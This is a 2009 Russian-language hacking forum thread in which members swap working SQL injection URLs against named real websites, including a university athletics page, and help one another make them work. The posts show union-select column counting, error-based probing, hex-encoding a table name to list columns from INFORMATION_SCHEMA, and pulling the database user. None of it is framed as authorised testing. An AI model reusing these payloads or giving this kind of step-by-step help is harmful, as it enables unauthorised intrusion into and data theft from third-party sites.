HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.01.2009, 01:18
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

AkyHa_MaTaTa, union%0Aselect, но все равно привет подзапросам, см сам)
 
Ответить с цитированием

  #2  
Старый 30.01.2009, 08:05
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

TELO
Цитата:
http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222--
1 колонка

Цитата:
http://www.bisound.com/index.php?name=Files&op=view_file&id=8533321+or+1= 1/*
скуля есть подбирай поля в ручную... перебрасывает изза того что запрос не верный )

Цитата:
http://sinelnikovo.org.ua/viewpage.php?page_id=21'
скули нет


x311
Цитата:
http://www.motion-twin.com/blog/day?d=20090109
хмм чтото не понятное) может просто ругается на неправильную дату?

Последний раз редактировалось sabe; 30.01.2009 в 08:21..
 
Ответить с цитированием

  #3  
Старый 30.01.2009, 18:31
x311
Новичок
Регистрация: 23.01.2009
Сообщений: 4
Провел на форуме:
9769

Репутация: -1
По умолчанию

x311

Цитата:
хмм чтото не понятное) может просто ругается на неправильную дату?
http://www.motion-twin.com/blog/month?m=10001'

ну бага ведь в месяце ....
 
Ответить с цитированием

  #4  
Старый 30.01.2009, 19:34
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

sabe
Код:
http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222+--+
1 колонка


не пойму, ну выводит 222,а как узнать версию?
 
Ответить с цитированием

  #5  
Старый 30.01.2009, 11:20
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Подобрал примерные таблицы (14 полей)
Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!)

Код:
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ibf_profile_portal'+limit+1,1--
Не выводиться =\
я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю)

вообщемс помогите что у меня не так в запросе
 
Ответить с цитированием

  #6  
Старый 30.01.2009, 11:24
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от diznt  
Подобрал примерные таблицы (14 полей)
Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!)

Код:
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ibf_profile_portal'+limit+1,1--
Не выводиться =\
я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю)

вообщемс помогите что у меня не так в запросе
название таблички в hex
0xHExназваниетаблицЫ
у тебя будет
Код:
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6962665f70726f66696c655f706f7274616c+limit+1,1--
 
Ответить с цитированием

  #7  
Старый 30.01.2009, 12:05
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Есть сайт так вот при подборе полей ниче не выводиться а когда подставляю id=1' то ошибка есть(еррор синтаксис)!
Мб кто знает?
Пробывал и так подобрать id=1'+union+select+1,2-- (и т.д.) все равно ошибка Mysql (причем в синтаксисе и перебрал я так до 20 полей) а если убрать ' то ниче не выводиться как я говорил
 
Ответить с цитированием

  #8  
Старый 30.01.2009, 12:07
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Ссылку сюда или сейчас начнем телепатировать всем ачатом
 
Ответить с цитированием

  #9  
Старый 30.01.2009, 12:08
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

http://www.brockport.edu/athletics/baseball/index.php?id=432'

:-)
 
Ответить с цитированием

  #10  
Старый 30.01.2009, 12:13
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

http://www.brockport.edu/athletics/baseball/index.php?id=-432'+union+select+1,2,3,user(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ